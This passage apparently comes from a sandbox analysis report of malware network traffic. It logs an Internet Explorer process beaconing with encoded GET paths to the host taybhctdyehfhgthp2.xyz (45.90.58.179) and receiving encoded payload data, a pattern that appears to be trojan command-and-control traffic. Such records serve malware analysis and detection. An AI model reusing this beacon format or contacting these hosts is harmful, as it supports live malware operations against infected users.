37 4b 55 67 75 73 4d 2b 72 4d 63 51 6c 39 76 42 6f 45 54 6a 39 70 53 74 68 61 70 39 32 41 6a 6e 52 76 69 7a 32 74 6e 44 2f 32 55 73 72 74 63 30 78 6c 32 5a 34 59 71 37 6d 30 62 6c 7a 59 4d 46 65 36 75 75 61 72 79 65 45 70 4a 64 50 50 42 61 4c 36 77 67 55 7a 39 72 7a 74 58 78 45 70 47 46 53 61 68 72 6c 33 4c 39 73 34 57 2f 36 57 30 66 47 56 4f 7a 6d 61 30 56 56 62 46 61 55 6d 47 32 45 79 51 7a 52 52 66 6f 42 6e 77 56 54 47 6c 76 51 45 31 71 5a 35 73 39 4d 6c 73 2b 53 79 42 6f 31 2f 35 33 68 6b 59 5a 70 31 6e 2f 4a 6a 46 78 6f 46 38 64 44 34 47 6b 77 72 37 4b 61 56 6a 77 35 35 4e 63 56 79 48 72 4d 49 7a 77 6a 45 6a 39 30 42 76 71 31 50 4a 6a 64 78 56 77 79 33 31 58 70 4a 6f 57 54 35 44 68 6e 2f 73 46 44 63 37 33 4f 31 65 59 71 47 58 4f 4a 37 66 73 2f 4e 33 61 62 44 2f 33 65 4b 63 7a 50 2b 73 66 71 70 70 53 77 39 59 67 54 52 6f 53 32 2f 7a 31 6b 71 51 4f 44 55 7a 41 43 75 70 49 34 66 63 52 63 57 43 6e 70 74 38 69 49 4a 45 7a 4d 48 45 39 6f 78 63 33 6e 66 62 67 47 6a 6d 39 6b 69 44 55 78 6a 58 55 79 67 44 61 59 6c 49 44 73 63 2f 45 39 52 51 47 41 4e 4e 6f 4b 45 67 6a 4c 50 45 47 56 73 64 74 57 45 48 63 6f 2b 33 75 34 5a 59 38 33 72 77 79 6e 4e 30 76 61 43 46 4e 4f 36 72 48 35 36 7a 6a 45 49 53 78 48 73 56 6a 6a 61 6e 6d 64 63 47 31 57 61 50 66 48 43 67 33 79 32 68 71 69 6c 54 61 58 46 37 2b 54 76 70 38 76 5a 72 35 4c 75 65 35 69 30 6c 46 53 6c 46 47 62 48 63 59 59 6c 44 44 55 4a 37 51 33 71 6c 6b 70 77 66 74 50 65 53 54 68 6b 30 61 66 65 72 30 47 77 6d 42 6f 47 48 58 73 41 42 51 57 33 79 50 4b 73 4f 61 33 57 37 79 2f 33 6a 79 62 55 53 6f 50 4e 76 4e 72 69 57 46 2f 65 44 30 61 71 63 6f 46 37 41 38 Data Ascii: 4a314grWALJ0AoRryMhLkb4+5fKF1BT3DlVu3juzEHaw/ZvSESmQvXQ8nkp0Y9RkdWgiz1iOK1D8NUr9iZdsdFr81JmpWg9txndzVGT0e6+TBYQEfcePQYnouQ3nEZTcDuRTcVVKp4MvyoAE76gDZYZb1U7TO6gWF5xGaEYDPRhX6KuBEDLnpKJYNxnZ/psk5Z/xirUQuqr5nQ8dCwbvnIa/DgDYf5CjgdswkgrrHo4q07m6Ae9mB+SF4L6qM5V+gw0a3LpeKTuWSy31lovo18D6cCZIfNM0yMsAqQjxDW0YaSyVeMTju6tvvYy5mUbusap7WImAWmagHKn0QCRYR37dI2nspX1DORs+15QbqbLOwsgLcdfeV6kwcHDhd4pMLLps1qlAISORQR2K4D6JYl8Xq1O7KUgusM+rMcQl9vBoETj9pSthap92AjnRviz2tnD/2Usrtc0xl2Z4Yq7m0blzYMFe6uuaryeEpJdPPBaL6wgUz9rztXxEpGFSahrl3L9s4W/6W0fGVOzma0VVbFaUmG2EyQzRRfoBnwVTGlvQE1qZ5s9Mls+SyBo1/53hkYZp1n/JjFxoF8dD4Gkwr7KaVjw55NcVyHrMIzwjEj90Bvq1PJjdxVwy31XpJoWT5Dhn/sFDc73O1eYqGXOJ7fs/N3abD/3eKczP+sfqppSw9YgTRoS2/z1kqQODUzACupI4fcRcWCnpt8iIJEzMHE9oxc3nfbgGjm9kiDUxjXUygDaYlIDsc/E9RQGANNoKEgjLPEGVsdtWEHco+3u4ZY83rwynN0vaCFNO6rH56zjEISxHsVjjanmdcG1WaPfHCg3y2hqilTaXF7+Tvp8vZr5Lue5i0lFSlFGbHcYYlDDUJ7Q3qlkpwftPeSThk0afer0GwmBoGHXsABQW3yPKsOa3W7y/3jybUSoPNvNriWF/eD0aqcoF7A8
Jul 6, 2021 14:30:52.327667952 CEST	10393	IN	Data Raw: 6c 78 63 44 32 47 56 63 61 36 54 4d 71 37 71 45 4a 45 6c 61 34 2b 50 55 76 34 6f 56 47 72 2f 78 32 67 77 72 79 32 69 75 4f 69 67 35 4f 36 2b 72 59 31 6e 53 34 46 74 79 61 54 71 5a 43 48 76 6f 31 6f 78 41 6f 43 36 32 44 62 48 4f 33 50 33 30 42 4c Data Ascii: lxcD2GVca6TMq7qEJEla4+PUv4oVGr/x2gwry2iuOig5O6+rY1nS4FtyaTqZCHvo1oxAoC62DbHO3P30BLghab//RvG9hkoVKtvUlf1dUfd/hFWNGLhQz9wnvaRsWtj0TveHk1mxLCbBq9qT9iZKYtFlcANnmzhxYXKJr7Qh7YnL3wanaF8xRzB0cBHcnYqzEDKRn/+h5NzRMklbkLP9dcsrxNWX2E8FgZrNX99blk+rAt+eSJy
Jul 6, 2021 14:30:52.327687979 CEST	10395	IN	Data Raw: 67 54 58 34 34 41 75 50 4d 36 34 66 56 45 49 4c 78 54 56 49 32 68 78 59 37 4e 44 62 68 6e 53 6d 65 44 70 61 33 65 77 44 38 30 44 33 6c 50 35 72 4f 68 6b 68 38 6e 42 30 67 62 64 35 42 4a 37 72 44 49 73 45 59 72 71 74 4a 72 6b 72 30 74 58 49 33 66 Data Ascii: gTX44AuPM64fVEILxTVI2hxY7NDbhnSmeDpa3ewD80D3lP5rOhkh8nB0gbd5BJ7rDIsEYrqtJrkr0tXI3f76TkOqKK8+XfqzUd6WsZvh07ElCb+UyD65n8N+NDwGOIwt/xp7rtZuunoVrkz+e1KZEHYuxlDgISMWMU3OBX4KOqL3C5T0V//4eYYBcIhnBaag/I9/pQwUJfr4KXB3N4p3P4Pf5cg0+SUGiD0GqNIP/wC1QaLUQrl
Jul 6, 2021 14:30:52.327723980 CEST	10396	IN	Data Raw: 45 6c 4b 71 41 61 43 7a 64 4f 33 64 33 4f 48 73 46 6f 4d 58 4d 51 73 2b 38 64 35 2f 46 78 39 5a 6d 64 71 41 62 75 2f 4a 68 4b 44 48 32 47 31 34 49 36 6f 76 51 58 70 6b 42 34 67 6f 44 65 4b 6c 5a 6e 65 4c 34 4c 48 47 4e 73 57 57 54 46 51 38 64 75 Data Ascii: ElKqAaCzdO3d3OHsFoMXMQs+8d5/Fx9ZmdqAbu/JhKDH2G14I6ovQXpkB4goDeKlZneL4LHGNsWWTFQ8dunZX+zXvxtQ8ZIAm0RdtWSPfmU8H+MqIfvLRq17/X8IWIo73/Oyi0zVXeSHJooo40JIzxNxmboREY/8lyErZvgDhHbXcwmys/MUghOhvpwwlDUkoJTQm+e0YcHyMIMgbBHIPDEIODzlqZ2aYLk/HCSx8zq/DZoODWj
Jul 6, 2021 14:30:52.327745914 CEST	10398	IN	Data Raw: 57 72 79 52 45 2f 4e 30 2b 6b 61 72 77 56 48 45 6e 70 69 5a 63 7a 6a 67 74 51 57 32 7a 4d 46 48 47 50 50 74 33 7a 37 61 65 77 30 46 4c 34 62 68 39 72 44 2b 54 4d 54 69 32 77 54 5a 55 6c 48 4e 4c 41 58 35 4f 72 48 43 78 30 50 4c 54 71 6c 6e 71 41 Data Ascii: WryRE/N0+karwVHEnpiZczjgtQW2zMFHGPPt3z7aew0FL4bh9rD+TMTi2wTZUlHNLAX5OrHCx0PLTqlnqAcOxSiHPN5MS9hyi9JwrV21NTuZkOPBH1kMSxOBiyxgJZmX6M1UvFBNjBmXFjA0yY5hFM9fvaMDA9Bxv6ETkIJbBkoUgzm7hStpnLWD/YBoE30sWHD+WiHtcVoaupUe5XusTrWI1wf4fwK8j3RhESxHcHX8CZb+lED
Jul 6, 2021 14:30:52.327764988 CEST	10399	IN	Data Raw: 35 5a 2b 43 4e 37 6d 73 6b 48 7a 70 79 50 44 4e 75 4c 68 67 48 31 59 44 45 47 65 69 4c 68 32 78 52 48 56 35 78 48 45 48 71 41 35 4e 56 4b 79 38 67 32 35 4e 66 66 6c 36 63 46 6d 4e 56 6f 42 4c 70 30 32 35 73 62 6f 73 61 63 36 75 48 36 6e 4b 39 44 Data Ascii: 5Z+CN7mskHzpyPDNuLhgH1YDEGeiLh2xRHV5xHEHqA5NVKy8g25Nffl6cFmNVoBLp025sbosac6uH6nK9DkEdHaDceK3scDeDcd1bZUYoO/j5tMgB1kOHdsIHILi6/hnW5ceouM8zuyDaL4W/lcEvDLTQucCFvZ7G1XL7fytejcD//xlHJ2EV6QXWLAyFaS2cj1+UgqRmDMtKlBZW16nCYDOdopSItXMfBJVDovsIe4t7xpu/tA
Jul 6, 2021 14:30:52.327781916 CEST	10400	IN	Data Raw: 44 36 71 66 30 6b 75 4e 46 68 4c 75 63 4a 2b 30 50 43 36 74 35 67 6e 5a 34 42 46 45 41 33 58 71 74 4e 31 4e 37 59 49 75 39 48 5a 4b 73 62 39 57 38 72 37 34 30 4a 77 56 6d 55 4b 6d 41 58 66 6e 36 67 62 57 33 6a 57 61 45 4b 71 5a 35 55 4a 35 62 35 Data Ascii: D6qf0kuNFhLucJ+0PC6t5gnZ4BFEA3XqtN1N7YIu9HZKsb9W8r740JwVmUKmAXfn6gbW3jWaEKqZ5UJ5b589F+hAD4qCwoqpOfGiRUsPZOXquWknnUPMh/UMxkG5XygSNHPIlPQf0KBO59FwzPCWCqvM8qAy7JqBzAmwQs0OYppXZCvZM69UaT929q8e42bBdTt5kbfi96lQ7k5soBqFf3veVQEajzauWHinoVxqRJi+OSRAHse
Jul 6, 2021 14:30:52.327800989 CEST	10402	IN	Data Raw: 6a 72 4c 46 44 76 4e 4b 67 6a 49 42 33 76 4e 61 4e 36 4c 7a 6a 59 41 55 64 67 39 6a 39 6d 30 54 68 34 74 4b 2b 73 4d 57 65 43 6e 48 50 42 6c 54 43 7a 77 42 54 79 33 64 72 34 5a 71 37 75 45 66 32 67 54 33 57 61 58 2b 75 51 44 33 31 75 7a 6e 46 39 Data Ascii: jrLFDvNKgjIB3vNaN6LzjYAUdg9j9m0Th4tK+sMWeCnHPBlTCzwBTy3dr4Zq7uEf2gT3WaX+uQD31uznF9UOsircDJQANKO0d82TKV+OaPW/0az5prwH1r3kFXPHqb3YZFmRfocn21t36MUXYNaFR+k14L7CRuWnfSZxkSxAQGsxXtxFOvMPuDSXa+bq4SRZV4kPJQDKUTiCGi8dwdtCnteI2zM+eMz6+TKJalUkPlWkfdZm5gQ
Jul 6, 2021 14:30:52.327820063 CEST	10403	IN	Data Raw: 49 6b 4c 6f 52 4a 67 6d 69 7a 63 64 34 69 36 47 4e 66 71 44 79 38 47 58 79 4c 48 4a 43 71 64 31 73 61 63 4f 32 51 76 77 62 58 59 78 44 4c 38 52 54 53 4c 44 68 7a 2f 4a 55 6b 70 4f 42 35 47 32 44 65 4a 6d 4a 75 38 61 42 72 66 4d 6d 73 33 38 34 53 Data Ascii: IkLoRJgmizcd4i6GNfqDy8GXyLHJCqd1sacO2QvwbXYxDL8RTSLDhz/JUkpOB5G2DeJmJu8aBrfMms384SXz5cBHV5i5Ba+8kAifi1l9/0Dg/MfoeaDzlhOk+o9g49hr/JBwAWj3HoiQowJfLcDm9Elomg8pODpgexMW9sXcUymehnqGz9G1zxS79+sdD4IP8wPtQmEnYLbxtID/Fl09Xn5abf73KLV31gWDkr0OJ20EDwcWczK
Jul 6, 2021 14:30:52.327841997 CEST	10405	IN	Data Raw: 65 74 7a 49 68 35 67 59 63 70 66 57 2f 48 4c 33 63 67 41 36 44 61 72 4e 53 56 75 6d 72 6b 59 67 50 51 44 45 51 36 79 4e 79 68 44 5a 50 64 55 6a 48 61 4d 6d 42 4f 2b 30 47 69 6a 53 51 39 5a 50 69 46 63 68 48 66 36 51 61 70 63 69 53 70 49 45 31 42 Data Ascii: etzIh5gYcpfW/HL3cgA6DarNSVumrkYgPQDEQ6yNyhDZPdUjHaMmBO+0GijSQ9ZPiFchHf6QapciSpIE1BxMU55qQm1QwQKY1xGtx9wSooSO1eApcBb2SybgCzjEfTJoYm2GoxBt+g5E7vxPfCX8Lz2KXylMKTD8bTn2zf2VU/pZtu8FDBW+CahSAvMKto5T+CXe4XUKbcebC1DkR1RUIEntenwJoIob30WZRkvqaWDDKmQLLZp
Jul 6, 2021 14:30:52.368022919 CEST	10406	IN	Data Raw: 64 48 44 76 77 46 55 30 39 77 51 59 54 50 48 6d 64 37 7a 49 58 78 36 74 5a 2b 64 68 6e 4c 4b 70 71 64 6f 51 6c 4a 52 45 50 55 54 43 53 42 61 62 67 50 6b 54 6f 66 79 47 32 61 45 4a 6c 6a 67 68 55 42 5a 57 49 49 52 68 49 4a 71 74 34 63 63 68 77 2f Data Ascii: dHDvwFU09wQYTPHmd7zIXx6tZ+dhnLKpqdoQlJREPUTCSBabgPkTofyG2aEJljghUBZWIIRhIJqt4cchw/qm5g4a34BSbj4qhHspzEAyAtjrK+do97NxAKp0nqqq2kMkdEnNw/LpCY396nFbN8Er0Uh113nBF8rYBZ44JUxy0z/QwOWlAtc1pmui9lyIe2de+SXTIL5voydZlgmZ3tssMh1Bims6Ee/BcLLq6HkHE1ZOP3nrmKs
Jul 6, 2021 14:30:53.813442945 CEST	10710	OUT	GET /jdraw/P4wQs6220jnbtlIYjS/M_2BrTOFK/S5ZrWVsOjLJpN_2FedVX/CBkwP5kzII66fKYw3z_/2FjIng5PhqmFkUxpfJCyXT/oTx8Wl7oZau6V/473q3ztH/dQPwZCOMD_2BpYilPiiz4nZ/uZIwiZ0fko/kjMIGTqZ5JCk_2FS0/Gy_2FwKsvZXz/cjy_2FkTVRx/BwPtRyW55ulGu6/1jq9nBFzw/u.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:30:53.871179104 CEST	10711	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:30:53 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2460 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 65 68 58 6c 64 53 77 58 51 69 59 4c 61 47 7a 6e 51 4e 35 59 46 37 72 33 4c 2f 65 66 4f 4c 62 34 4c 6e 5a 31 6f 41 59 70 74 38 6c 67 50 47 50 65 2f 67 66 38 2f 44 47 54 62 56 36 6d 37 59 77 70 55 52 33 4d 57 6f 32 55 74 4b 64 44 6d 46 34 41 50 43 46 72 61 4a 52 45 77 6c 4a 57 6e 6b 6f 62 38 53 73 51 4e 4a 68 72 79 77 76 4b 71 77 2b 62 53 6f 6f 48 59 75 77 6c 49 42 6b 6e 4f 64 73 70 58 39 45 51 65 33 53 76 39 65 2b 4d 4a 47 7a 42 55 56 30 68 61 45 44 62 61 30 58 41 6b 4f 62 75 44 59 4e 52 6a 31 38 78 6e 4e 69 58 69 36 57 73 36 30 50 6a 63 30 2f 48 55 30 69 39 62 4c 52 70 52 67 35 39 53 54 6b 55 71 46 47 73 38 43 34 31 32 48 31 78 56 64 6d 63 35 64 32 76 72 72 77 31 57 37 32 36 78 64 78 4c 4a 62 42 35 50 72 59 69 50 6f 4d 41 50 31 59 4e 39 50 2b 4b 59 7a 6d 6c 4f 56 47 4b 65 49 76 66 69 4b 79 64 4e 37 61 78 79 55 71 35 2f 77 70 67 41 53 47 2b 2f 30 71 4f 41 61 30 6f 65 53 68 35 51 36 7a 34 4c 65 39 31 58 37 6f 34 32 6a 6d 4f 51 6e 69 53 77 63 2f 41 6e 59 66 6c 6c 67 45 4c 2b 58 5a 2f 69 6f 55 59 4e 69 62 4a 56 6f 58 44 36 65 69 58 4f 6c 37 4d 4f 4b 61 70 79 31 42 62 2b 47 79 77 7a 79 38 74 50 5a 6a 34 54 6b 7a 4f 67 2f 6b 44 6f 6c 43 7a 6d 4b 73 33 50 75 62 48 4c 41 42 34 65 6a 51 45 44 2f 38 66 51 51 6b 46 71 39 50 41 69 59 78 75 70 44 6e 55 69 43 58 67 39 37 76 41 51 42 75 53 4a 73 46 6a 39 6b 37 53 62 51 66 35 6c 72 55 46 54 32 39 6f 50 58 57 41 46 4f 2b 69 76 49 39 54 4c 56 53 36 47 4d 35 56 31 56 51 37 33 4a 46 7a 34 30 48 38 57 35 6a 33 6d 4b 44 73 2b 4c 6b 39 2f 79 70 4e 53 51 52 62 45 41 69 74 6d 49 30 4c 36 39 76 2f 4f 70 79 43 5a 66 77 32 62 4c 72 33 55 4d 6a 79 51 36 6a 63 34 37 32 75 52 54 42 6a 6c 75 6b 74 59 75 4a 4b 74 4f 78 6d 6c 30 6b 46 61 4d 35 4f 51 48 61 6e 43 4b 55 46 55 44 30 5a 45 72 34 31 4f 62 4d 48 67 66 54 4c 41 2b 47 56 51 41 43 32 4d 34 69 36 6f 52 58 62 33 2f 46 44 37 4f 37 71 36 49 71 6e 75 6e 55 33 57 36 78 6f 36 46 6b 6b 77 78 4d 77 46 61 39 33 54 7a 62 49 35 6c 55 36 75 59 6e 59 2b 6b 4c 59 52 51 62 79 54 46 56 33 5a 6d 49 70 4e 70 75 2f 74 7a 50 41 32 5a 41 6b 4e 32 53 4a 74 61 54 66 4d 4f 62 71 67 57 65 69 49 56 57 5a 44 49 36 59 5a 34 50 65 6f 59 56 47 56 50 54 78 56 6f 39 7a 56 57 65 35 58 36 7a 51 72 71 57 43 47 47 45 69 77 4c 5a 51 4c 45 78 76 6a 63 76 4a 35 2b 55 6c 77 36 4a 57 38 73 32 39 73 37 34 6b 63 38 56 6f 42 78 30 68 74 36 57 56 64 70 62 59 30 30 63 44 66 76 5a 6c 71 50 5a 45 79 44 6a 75 54 68 38 30 67 77 61 4d 30 52 54 67 69 31 79 61 78 2f 44 41 4b 34 30 63 59 37 57 6e 72 64 2f 53 6e 66 64 30 6d 51 68 62 65 6d 48 32 6d 63 73 53 43 45 44 6c 56 32 47 69 59 50 6c 46 6e 6f 6a 7a 38 56 79 53 52 7a 5a 75 42 34 39 6e 6a 76 38 54 76 72 69 37 48 65 57 53 52 6e 49 33 73 47 51 76 45 6a 37 42 4c 33 54 48 55 48 2f 4e 48 58 51 4c 45 4e 4f 71 5a 6b 49 63 78 4a 51 43 71 78 4c 48 6a 6f 66 61 58 65 47 4c 38 64 49 49 52 45 32 4a 32 33 63 4b 4e 72 2f 32 56 34 74 63 66 44 79 31 52 59 4a 2b 2b 6d 74 2f Data Ascii: ehXldSwXQiYLaGznQN5YF7r3L/efOLb4LnZ1oAYpt8lgPGPe/gf8/DGTbV6m7YwpUR3MWo2UtKdDmF4APCFraJREwlJWnkob8SsQNJhrywvKqw+bSooHYuwlIBknOdspX9EQe3Sv9e+MJGzBUV0haEDba0XAkObuDYNRj18xnNiXi6Ws60Pjc0/HU0i9bLRpRg59STkUqFGs8C412H1xVdmc5d2vrrw1W726xdxLJbB5PrYiPoMAP1YN9P+KYzmlOVGKeIvfiKydN7axyUq5/wpgASG+/0qOAa0oeSh5Q6z4Le91X7o42jmOQniSwc/AnYfllgEL+XZ/ioUYNibJVoXD6eiXOl7MOKapy1Bb+Gywzy8tPZj4TkzOg/kDolCzmKs3PubHLAB4ejQED/8fQQkFq9PAiYxupDnUiCXg97vAQBuSJsFj9k7SbQf5lrUFT29oPXWAFO+ivI9TLVS6GM5V1VQ73JFz40H8W5j3mKDs+Lk9/ypNSQRbEAitmI0L69v/OpyCZfw2bLr3UMjyQ6jc472uRTBjluktYuJKtOxml0kFaM5OQHanCKUFUD0ZEr41ObMHgfTLA+GVQAC2M4i6oRXb3/FD7O7q6IqnunU3W6xo6FkkwxMwFa93TzbI5lU6uYnY+kLYRQbyTFV3ZmIpNpu/tzPA2ZAkN2SJtaTfMObqgWeiIVWZDI6YZ4PeoYVGVPTxVo9zVWe5X6zQrqWCGGEiwLZQLExvjcvJ5+Ulw6JW8s29s74kc8VoBx0ht6WVdpbY00cDfvZlqPZEyDjuTh80gwaM0RTgi1yax/DAK40cY7Wnrd/Snfd0mQhbemH2mcsSCEDlV2GiYPlFnojz8VySRzZuB49njv8Tvri7HeWSRnI3sGQvEj7BL3THUH/NHXQLENOqZkIcxJQCqxLHjofaXeGL8dIIRE2J23cKNr/2V4tcfDy1RYJ++mt/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49878	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:02.086342096 CEST	10932	OUT	GET /jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:02.145881891 CEST	10934	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:02 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 61 35 63 30 0d 0a 54 37 50 43 46 2b 46 31 4a 55 4b 41 54 62 62 73 6b 6e 55 32 76 58 53 4c 57 30 70 45 54 4a 56 69 7a 51 2b 44 68 35 45 4d 66 73 37 78 45 66 79 46 33 4b 48 51 69 53 71 48 7a 55 68 43 2b 65 4f 65 34 78 4f 6d 6b 74 78 46 38 68 6b 49 4e 50 41 79 47 77 74 4c 75 78 6a 7a 51 55 58 30 64 4f 6c 78 52 68 6c 32 49 79 4d 71 6a 6c 52 6b 53 79 56 4f 65 72 75 63 56 6c 49 33 75 36 35 62 70 6a 30 4f 6d 52 76 43 57 47 38 4a 71 2b 4c 33 74 4a 74 4f 76 31 74 42 74 47 5a 58 5a 42 6c 75 79 32 70 34 54 56 54 57 67 70 50 7a 4f 51 77 76 6d 30 72 68 56 73 4f 48 62 78 44 4b 4c 7a 6b 59 36 4d 50 32 52 32 47 70 50 39 78 71 42 52 46 34 67 7a 30 48 74 53 4d 58 6a 77 44 4e 77 71 46 63 49 32 34 46 62 2b 31 2b 64 73 65 35 69 4c 44 66 51 79 42 35 71 37 33 61 6d 39 61 52 67 36 74 75 43 71 65 53 47 50 4e 64 75 30 44 6f 72 43 2b 65 36 35 37 42 6b 32 69 57 66 4b 4e 72 45 4a 47 34 33 76 4a 4e 2b 68 45 30 6f 4c 37 69 76 34 31 4c 50 36 37 33 61 4b 41 35 6c 33 62 49 48 6f 46 77 4c 30 4f 78 37 6a 69 48 37 5a 36 52 4e 61 37 42 2b 38 42 66 6d 34 51 42 66 4e 31 68 30 55 35 75 47 73 65 68 71 78 7a 56 48 33 46 65 44 77 4f 6b 42 7a 75 43 39 6a 62 4a 7a 77 4c 4b 38 61 2b 6a 49 67 51 53 4a 52 6d 4d 54 43 72 32 33 79 67 67 46 4d 42 75 6b 39 34 32 4c 57 52 45 46 4a 79 58 57 32 52 65 47 61 38 61 63 75 79 7a 54 36 55 57 5a 35 68 4f 58 6e 79 58 54 43 46 61 39 48 76 4c 71 72 56 36 41 74 56 6c 78 62 34 46 37 34 49 51 63 79 50 6f 36 4d 4a 2f 58 6c 74 57 52 6e 44 66 55 61 4d 62 6f 4e 6d 51 58 41 70 4c 56 39 49 4a 66 4a 74 36 50 55 37 7a 66 78 59 37 48 46 4d 4c 68 59 49 62 7a 61 61 43 75 63 71 58 57 33 61 77 6b 30 4e 44 31 54 30 6e 36 4e 36 59 35 57 44 44 6f 69 4e 7a 4b 64 51 4a 4b 69 6e 48 2f 4b 73 4b 32 71 2f 30 2b 34 69 53 42 31 53 33 63 50 35 4a 77 31 54 48 77 4f 45 37 74 6b 77 54 71 71 2f 6b 4e 33 65 63 37 64 6d 38 75 47 30 70 4c 64 2b 63 69 4d 6d 42 68 44 41 31 4c 78 69 6c 53 72 6a 36 6d 64 6f 45 70 6f 55 7a 68 51 30 63 49 6b 69 59 7a 6e 4c 49 4f 41 75 4b 4c 4a 76 43 78 39 4b 32 6c 2f 70 58 35 76 68 52 47 45 49 34 57 69 4b 6d 73 33 34 4e 76 78 44 77 31 42 72 70 70 65 48 66 71 36 6d 35 62 5a 4a 2b 6a 47 6e 57 51 33 56 54 43 39 68 70 2b 7a 62 30 6b 50 51 41 4a 38 61 6f 6d 73 4b 35 45 4d 4b 41 6a 38 75 65 45 4f 70 66 79 6e 54 53 6b 4c 68 61 52 43 6b 5a 31 48 65 2f 34 59 7a 4e 38 41 58 31 6b 50 45 73 4c 2b 71 47 41 69 41 6c 51 50 45 54 62 4c 65 72 36 48 61 2b 76 66 77 69 5a 50 34 41 58 55 33 77 49 42 45 62 78 48 72 67 6e 4e 2f 47 67 38 66 36 33 47 6d 33 38 42 66 52 68 50 77 59 39 6a 79 47 52 34 42 56 50 35 78 39 4a 66 43 32 35 6f 61 74 2f 6e 57 35 4e 39 68 73 5a 4b 34 48 33 6f 64 71 52 4f 75 44 59 31 53 4c 76 6b 42 64 57 72 65 54 42 78 75 55 37 72 67 34 2b 45 6c 41 45 6c 52 7a 52 70 48 37 63 67 52 50 72 32 4a 7a 47 35 79 51 55 36 55 34 38 51 31 6f 6b 44 31 4c 42 33 7a 6b 66 46 67 74 4d 46 35 6f 68 43 56 70 72 38 4d 54 37 51 75 34 51 50 38 73 6e 50 Data Ascii: 3a5c0T7PCF+F1JUKATbbsknU2vXSLW0pETJVizQ+Dh5EMfs7xEfyF3KHQiSqHzUhC+eOe4xOmktxF8hkINPAyGwtLuxjzQUX0dOlxRhl2IyMqjlRkSyVOerucVlI3u65bpj0OmRvCWG8Jq+L3tJtOv1tBtGZXZBluy2p4TVTWgpPzOQwvm0rhVsOHbxDKLzkY6MP2R2GpP9xqBRF4gz0HtSMXjwDNwqFcI24Fb+1+dse5iLDfQyB5q73am9aRg6tuCqeSGPNdu0DorC+e657Bk2iWfKNrEJG43vJN+hE0oL7iv41LP673aKA5l3bIHoFwL0Ox7jiH7Z6RNa7B+8Bfm4QBfN1h0U5uGsehqxzVH3FeDwOkBzuC9jbJzwLK8a+jIgQSJRmMTCr23yggFMBuk942LWREFJyXW2ReGa8acuyzT6UWZ5hOXnyXTCFa9HvLqrV6AtVlxb4F74IQcyPo6MJ/XltWRnDfUaMboNmQXApLV9IJfJt6PU7zfxY7HFMLhYIbzaaCucqXW3awk0ND1T0n6N6Y5WDDoiNzKdQJKinH/KsK2q/0+4iSB1S3cP5Jw1THwOE7tkwTqq/kN3ec7dm8uG0pLd+ciMmBhDA1LxilSrj6mdoEpoUzhQ0cIkiYznLIOAuKLJvCx9K2l/pX5vhRGEI4WiKms34NvxDw1BrppeHfq6m5bZJ+jGnWQ3VTC9hp+zb0kPQAJ8aomsK5EMKAj8ueEOpfynTSkLhaRCkZ1He/4YzN8AX1kPEsL+qGAiAlQPETbLer6Ha+vfwiZP4AXU3wIBEbxHrgnN/Gg8f63Gm38BfRhPwY9jyGR4BVP5x9JfC25oat/nW5N9hsZK4H3odqROuDY1SLvkBdWreTBxuU7rg4+ElAElRzRpH7cgRPr2JzG5yQU6U48Q1okD1LB3zkfFgtMF5ohCVpr8MT7Qu4QP8snP
Jul 6, 2021 14:31:02.145915031 CEST	10935	IN	Data Raw: 70 72 46 6b 52 6e 74 65 4e 31 71 34 6b 53 6b 68 4d 51 78 4e 2f 50 34 44 71 52 45 2f 6e 54 45 71 41 48 4c 48 41 6c 32 2b 45 4c 6d 49 33 51 52 42 52 47 4e 6a 53 65 63 72 4b 73 62 45 71 4f 53 4c 39 70 75 70 42 6e 6d 71 34 67 46 6e 66 74 6b 30 61 34 Data Ascii: prFkRnteN1q4kSkhMQxN/P4DqRE/nTEqAHLHAl2+ELmI3QRBRGNjSecrKsbEqOSL9pupBnmq4gFnftk0a4yQEkxphjhr12paTp3m6LC7H1HP+1MMCpo9tvgu0ogeyNvtRpW/ywVMxJrWS84trZHHPoz55qf56RD275lvuEOo9p3lWdqGyHoI6gVDvotLEtUu4MwlYm1E5yQMU1OZj0uN8RmMMwTy5P8cXm6PQc/Je3n4N0Boys6
